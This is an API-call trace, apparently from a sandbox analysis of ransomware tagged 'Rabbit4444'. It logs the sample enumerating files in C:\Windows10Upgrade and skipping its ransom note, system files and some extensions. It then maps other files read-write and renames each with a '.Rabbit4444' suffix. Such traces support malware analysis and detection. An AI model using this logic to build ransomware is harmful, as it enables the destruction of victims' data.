lstrlenW (lpString="DW20.EXE") returned 8 [0043.334] lstrlenW (lpString="Rabbit4444") returned 10 [0043.334] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0043.334] lstrlenW (lpString=".dll") returned 4 [0043.334] lstrcmpiW (lpString1=".EXE", lpString2=".dll") returned 1 [0043.334] lstrlenW (lpString=".lnk") returned 4 [0043.334] lstrcmpiW (lpString1=".EXE", lpString2=".lnk") returned -1 [0043.334] lstrlenW (lpString=".ini") returned 4 [0043.334] lstrcmpiW (lpString1=".EXE", lpString2=".ini") returned -1 [0043.334] lstrlenW (lpString=".sys") returned 4 [0043.335] lstrcmpiW (lpString1=".EXE", lpString2=".sys") returned -1 [0043.335] CreateFileW (lpFileName="C:\\Windows10Upgrade\\DW20.EXE" (normalized: "c:\\windows10upgrade\\dw20.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0043.335] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0043.335] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13464545478) returned 1 [0043.335] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=643784) returned 1 [0043.335] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0xf1448 [0043.335] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0043.335] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9d5d0, lpName=0x0) returned 0x280 [0043.339] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9d5d0) returned 0x1310000 [0043.957] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x119df0 [0043.957] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0043.957] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119df0 | out: hHeap=0xe0000) returned 1 [0043.957] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0043.958] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0043.958] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0043.958] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0043.958] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0043.958] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13526864816) returned 1 [0043.958] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf1448 | out: hHeap=0xe0000) returned 1 [0043.958] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0043.958] UnmapViewOfFile (lpBaseAddress=0x1310000) returned 1 [0043.964] CloseHandle (hObject=0x280) returned 1 [0043.964] CloseHandle (hObject=0x278) returned 1 [0043.977] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\DW20.EXE.Rabbit4444") returned 39 [0043.977] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\DW20.EXE" (normalized: "c:\\windows10upgrade\\dw20.exe"), lpNewFileName="C:\\Windows10Upgrade\\DW20.EXE.Rabbit4444" (normalized: "c:\\windows10upgrade\\dw20.exe.rabbit4444"), dwFlags=0x1) returned 1 [0043.978] InterlockedExchangeAdd (in: Addend=0xff618, Value=643792 | out: Addend=0xff618) returned 118496 [0043.978] InterlockedExchangeAdd (in: Addend=0xff624, Value=623 | out: Addend=0xff624) returned 296 [0043.978] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea385605, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea385605, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0xc2c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DWDCW20.DLL", cAlternateFileName="")) returned 1 [0043.978] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.978] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.978] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="Rabbit4444.exe") returned -1 [0043.978] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2=".") returned 1 [0043.978] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="..") returned 1 [0043.978] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="windows") returned -1 [0043.978] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="bootmgr") returned 1 [0043.978] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="pagefile.sys") returned -1 [0043.978] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="boot") returned 1 [0043.978] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="ids.txt") returned -1 [0043.978] lstrcmpiW (lpString1="DWDCW20.DLL", lpString2="NTUSER.DAT") returned -1 [0043.979] lstrcpyW (in: lpString1=0x130eb60, lpString2="DWDCW20.DLL" | out: lpString1="DWDCW20.DLL") returned="DWDCW20.DLL" [0043.979] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\DWDCW20.DLL", dwFileAttributes=0x0) returned 1 [0043.979] lstrlenW (lpString="DWDCW20.DLL") returned 11 [0043.979] lstrlenW (lpString="Rabbit4444") returned 10 [0043.979] lstrcmpiW (lpString1="WDCW20.DLL", lpString2="Rabbit4444") returned 1 [0043.979] lstrlenW (lpString=".dll") returned 4 [0043.979] lstrcmpiW (lpString1=".DLL", lpString2=".dll") returned 0 [0043.980] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea386943, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea386943, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0xb2c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0043.980] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.980] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.980] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="Rabbit4444.exe") returned -1 [0043.980] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2=".") returned 1 [0043.980] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="..") returned 1 [0043.980] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="windows") returned -1 [0043.980] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="bootmgr") returned 1 [0043.980] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="pagefile.sys") returned -1 [0043.980] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="boot") returned 1 [0043.980] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="ids.txt") returned -1 [0043.980] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="NTUSER.DAT") returned -1 [0043.980] lstrcpyW (in: lpString1=0x130eb60, lpString2="DWTRIG20.EXE" | out: lpString1="DWTRIG20.EXE") returned="DWTRIG20.EXE" [0043.980] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\DWTRIG20.EXE", dwFileAttributes=0x0) returned 1 [0043.980] lstrlenW (lpString="DWTRIG20.EXE") returned 12 [0043.980] lstrlenW (lpString="Rabbit4444") returned 10 [0043.980] lstrcmpiW (lpString1="TRIG20.EXE", lpString2="Rabbit4444") returned 1 [0043.980] lstrlenW (lpString=".dll") returned 4 [0043.980] lstrcmpiW (lpString1=".EXE", lpString2=".dll") returned 1 [0043.980] lstrlenW (lpString=".lnk") returned 4 [0043.980] lstrcmpiW (lpString1=".EXE", lpString2=".lnk") returned -1 [0043.980] lstrlenW (lpString=".ini") returned 4 [0043.980] lstrcmpiW (lpString1=".EXE", lpString2=".ini") returned -1 [0043.980] lstrlenW (lpString=".sys") returned 4 [0043.980] lstrcmpiW (lpString1=".EXE", lpString2=".sys") returned -1 [0043.980] CreateFileW (lpFileName="C:\\Windows10Upgrade\\DWTRIG20.EXE" (normalized: "c:\\windows10upgrade\\dwtrig20.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0043.981] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0043.981] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13529139361) returned 1 [0043.981] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=45768) returned 1 [0043.981] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0043.981] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0043.981] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb5d0, lpName=0x0) returned 0x280 [0043.982] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb5d0) returned 0x70000 [0044.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0044.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0044.352] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0044.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0044.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0044.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0044.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0044.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0044.353] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13566344320) returned 1 [0044.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0044.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0044.353] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0044.353] CloseHandle (hObject=0x280) returned 1 [0044.353] CloseHandle (hObject=0x278) returned 1 [0044.356] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\DWTRIG20.EXE.Rabbit4444") returned 43 [0044.356] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\DWTRIG20.EXE" (normalized: "c:\\windows10upgrade\\dwtrig20.exe"), lpNewFileName="C:\\Windows10Upgrade\\DWTRIG20.EXE.Rabbit4444" (normalized: "c:\\windows10upgrade\\dwtrig20.exe.rabbit4444"), dwFlags=0x1) returned 1 [0044.356] InterlockedExchangeAdd (in: Addend=0xff618, Value=45776 | out: Addend=0xff618) returned 762288 [0044.356] InterlockedExchangeAdd (in: Addend=0xff624, Value=372 | out: Addend=0xff624) returned 919 [0044.356] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea387cd0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea387cd0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x2652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EnableWiFiTracing.cmd", cAlternateFileName="ENABLE~1.CMD")) returned 1 [0044.356] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.357] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.357] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="Rabbit4444.exe") returned -1 [0044.357] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2=".") returned 1 [0044.357] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="..") returned 1 [0044.357] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="windows") returned -1 [0044.357] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="bootmgr") returned 1 [0044.357] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="pagefile.sys") returned -1 [0044.357] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="boot") returned 1 [0044.357] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="ids.txt") returned -1 [0044.357] lstrcmpiW (lpString1="EnableWiFiTracing.cmd", lpString2="NTUSER.DAT") returned -1 [0044.357] lstrcpyW (in: lpString1=0x130eb60, lpString2="EnableWiFiTracing.cmd" | out: lpString1="EnableWiFiTracing.cmd") returned="EnableWiFiTracing.cmd" [0044.357] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\EnableWiFiTracing.cmd", dwFileAttributes=0x0) returned 1 [0044.357] lstrlenW (lpString="EnableWiFiTracing.cmd") returned 21 [0044.357] lstrlenW (lpString="Rabbit4444") returned 10 [0044.357] lstrcmpiW (lpString1="racing.cmd", lpString2="Rabbit4444") returned 1 [0044.357] lstrlenW (lpString=".dll") returned 4 [0044.357] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0044.357] lstrlenW (lpString=".lnk") returned 4 [0044.357] lstrcmpiW (lpString1=".cmd", lpString2=".lnk") returned -1 [0044.357] lstrlenW (lpString=".ini") returned 4 [0044.357] lstrcmpiW (lpString1=".cmd", lpString2=".ini") returned -1 [0044.358] lstrlenW (lpString=".sys") returned 4 [0044.358] lstrcmpiW (lpString1=".cmd", lpString2=".sys") returned -1 [0044.358] CreateFileW (lpFileName="C:\\Windows10Upgrade\\EnableWiFiTracing.cmd" (normalized: "c:\\windows10upgrade\\enablewifitracing.cmd"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0044.358] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0044.358] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13566852019) returned 1 [0044.358] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=9810) returned 1 [0044.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0044.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0044.358] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2960, lpName=0x0) returned 0x280 [0044.359] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2960) returned 0x70000 [0044.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0044.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0044.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0044.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0044.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0044.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0044.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0044.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0044.361] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13567199021) returned 1 [0044.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0044.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0044.361] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0044.362] CloseHandle (hObject=0x280) returned 1 [0044.362] CloseHandle (hObject=0x278) returned 1 [0044.363] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\EnableWiFiTracing.cmd.Rabbit4444") returned 52 [0044.363] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\EnableWiFiTracing.cmd" (normalized: "c:\\windows10upgrade\\enablewifitracing.cmd"), lpNewFileName="C:\\Windows10Upgrade\\EnableWiFiTracing.cmd.Rabbit4444" (normalized: "c:\\windows10upgrade\\enablewifitracing.cmd.rabbit4444"), dwFlags=0x1) returned 1 [0044.364] InterlockedExchangeAdd (in: Addend=0xff618, Value=9824 | out: Addend=0xff618) returned 808064 [0044.364] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 1291 [0044.364] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea389060, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea389060, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x10cc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESDHelper.dll", cAlternateFileName="ESDHEL~1.DLL")) returned 1 [0044.364] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.364] lstrcmpiW (lpString1="ESDHelper.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.364] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="Rabbit4444.exe") returned -1 [0044.364] lstrcmpiW (lpString1="ESDHelper.dll", lpString2=".") returned 1 [0044.364] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="..") returned 1 [0044.364] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="windows") returned -1 [0044.364] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="bootmgr") returned 1 [0044.364] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="pagefile.sys") returned -1 [0044.364] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="boot") returned 1 [0044.364] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="ids.txt") returned -1 [0044.364] lstrcmpiW (lpString1="ESDHelper.dll", lpString2="NTUSER.DAT") returned -1 [0044.364] lstrcpyW (in: lpString1=0x130eb60, lpString2="ESDHelper.dll" | out: lpString1="ESDHelper.dll") returned="ESDHelper.dll" [0044.364] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\ESDHelper.dll", dwFileAttributes=0x0) returned 1 [0044.365] lstrlenW (lpString="ESDHelper.dll") returned 13 [0044.365] lstrlenW (lpString="Rabbit4444") returned 10 [0044.365] lstrcmpiW (lpString1="Helper.dll", lpString2="Rabbit4444") returned -1 [0044.365] lstrlenW (lpString=".dll") returned 4 [0044.365] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0044.365] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea38cadd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea38cadd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x9ec8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="esdstub.dll", cAlternateFileName="")) returned 1 [0044.365] lstrcmpiW (lpString1="esdstub.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.365] lstrcmpiW (lpString1="esdstub.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.365] lstrcmpiW (lpString1="esdstub.dll", lpString2="Rabbit4444.exe") returned -1 [0044.365] lstrcmpiW (lpString1="esdstub.dll", lpString2=".") returned 1 [0044.365] lstrcmpiW (lpString1="esdstub.dll", lpString2="..") returned 1 [0044.365] lstrcmpiW (lpString1="esdstub.dll", lpString2="windows") returned -1 [0044.365] lstrcmpiW (lpString1="esdstub.dll", lpString2="bootmgr") returned 1 [0044.365] lstrcmpiW (lpString1="esdstub.dll", lpString2="pagefile.sys") returned -1 [0044.365] lstrcmpiW (lpString1="esdstub.dll", lpString2="boot") returned 1 [0044.365] lstrcmpiW (lpString1="esdstub.dll", lpString2="ids.txt") returned -1 [0044.365] lstrcmpiW (lpString1="esdstub.dll", lpString2="NTUSER.DAT") returned -1 [0044.365] lstrcpyW (in: lpString1=0x130eb60, lpString2="esdstub.dll" | out: lpString1="esdstub.dll") returned="esdstub.dll" [0044.365] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\esdstub.dll", dwFileAttributes=0x0) returned 1 [0044.367] lstrlenW (lpString="esdstub.dll") returned 11 [0044.367] lstrlenW (lpString="Rabbit4444") returned 10 [0044.367] lstrcmpiW (lpString1="sdstub.dll", lpString2="Rabbit4444") returned 1 [0044.367] lstrlenW (lpString=".dll") returned 4 [0044.367] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0044.367] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea38de7f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea38de7f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x89ec8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GatherOSState.EXE", cAlternateFileName="GATHER~1.EXE")) returned 1 [0044.367] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.367] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.367] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="Rabbit4444.exe") returned -1 [0044.367] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2=".") returned 1 [0044.367] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="..") returned 1 [0044.367] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="windows") returned -1 [0044.367] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="bootmgr") returned 1 [0044.367] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="pagefile.sys") returned -1 [0044.367] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="boot") returned 1 [0044.367] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="ids.txt") returned -1 [0044.367] lstrcmpiW (lpString1="GatherOSState.EXE", lpString2="NTUSER.DAT") returned -1 [0044.367] lstrcpyW (in: lpString1=0x130eb60, lpString2="GatherOSState.EXE" | out: lpString1="GatherOSState.EXE") returned="GatherOSState.EXE" [0044.367] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\GatherOSState.EXE", dwFileAttributes=0x0) returned 1 [0044.368] lstrlenW (lpString="GatherOSState.EXE") returned 17 [0044.368] lstrlenW (lpString="Rabbit4444") returned 10 [0044.368] lstrcmpiW (lpString1="SState.EXE", lpString2="Rabbit4444") returned 1 [0044.368] lstrlenW (lpString=".dll") returned 4 [0044.368] lstrcmpiW (lpString1=".EXE", lpString2=".dll") returned 1 [0044.368] lstrlenW (lpString=".lnk") returned 4 [0044.368] lstrcmpiW (lpString1=".EXE", lpString2=".lnk") returned -1 [0044.368] lstrlenW (lpString=".ini") returned 4 [0044.368] lstrcmpiW (lpString1=".EXE", lpString2=".ini") returned -1 [0044.368] lstrlenW (lpString=".sys") returned 4 [0044.368] lstrcmpiW (lpString1=".EXE", lpString2=".sys") returned -1 [0044.368] CreateFileW (lpFileName="C:\\Windows10Upgrade\\GatherOSState.EXE" (normalized: "c:\\windows10upgrade\\gatherosstate.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0044.368] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0044.368] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13567876576) returned 1 [0044.368] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=564936) returned 1 [0044.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0044.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0044.368] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8a1d0, lpName=0x0) returned 0x280 [0044.370] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8a1d0) returned 0x2b0000 [0044.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0044.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0044.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0044.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0044.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0044.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0044.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0044.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0044.741] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13605155719) returned 1 [0044.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0044.741] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0044.741] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0044.747] CloseHandle (hObject=0x280) returned 1 [0044.747] CloseHandle (hObject=0x278) returned 1 [0044.915] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\GatherOSState.EXE.Rabbit4444") returned 48 